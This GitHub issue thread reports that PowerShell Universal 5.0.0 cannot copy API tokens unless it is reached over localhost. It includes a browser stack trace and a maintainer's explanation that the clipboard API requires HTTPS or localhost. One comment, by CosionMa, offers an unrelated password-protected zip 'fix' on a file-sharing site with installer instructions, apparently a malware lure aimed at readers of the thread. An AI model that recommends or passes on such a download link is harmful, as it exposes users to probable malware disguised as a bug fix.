### ISSUE TITLE
Unable to copy token unless on localhost

### ISSUE THREAD

**Issue by tempest918** [ironmansoftware/powershell-universal#3655]
### Version

5.0.0

### Severity

High

### Environment

msi

### Steps to Reproduce

1. Navigate to instance via CNAME or hostname in your workstation browser
2. Log in (either admin or Windows auth, doesn't matter)
3. Navigate to Token page and copy any token.

Happens in Chrome and Edge.  Logging into the server directly and navigating to the page via localhost allows you to copy the token without error.  

### Expected behavior

```console
Copied!
```

### Actual behavior

```console
An error occured. Could not find 'navigator.clipboard.writeText' ('clipboard' was undefined). Error: Could not find 'navigator.clipboard.writeText' ('clipboard' was undefined). 
at http://naus16psu1/_framework/blazor.server.js:1:537 
at Array.forEach (<anonymous>) 
at l.findFunction (http://naus16psu1/_framework/blazor.server.js:1:505) 
at _ (http://naus16psu1/_framework/blazor.server.js:1:5248) 
at http://naus16psu1/_framework/blazor.server.js:1:3041 
at new Promise (<anonymous>) 
at y.beginInvokeJSFromDotNet (http://naus16psu1/_framework/blazor.server.js:1:3004) 
at Xt._invokeClientMethod (http://naus16psu1/_framework/blazor.server.js:1:60890) 
at Xt._processIncomingData (http://naus16psu1/_framework/blazor.server.js:1:58279) 
at Xt.connection.onreceive (http://naus16psu1/_framework/blazor.server.js:1:51920)
```

### Additional Environment data

New 5.0.0 installation running via Kestrel on Windows Server 2016.  

### Screenshots/Animations

https://github.com/user-attachments/assets/e7094020-199b-4d55-934b-d29f230d2dbd

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by adamdriscoll** [comment]
This is because we are using an API that requires HTTPS or localhost.

https://stackoverflow.com/a/51823007

We'll get the workaround implemented.
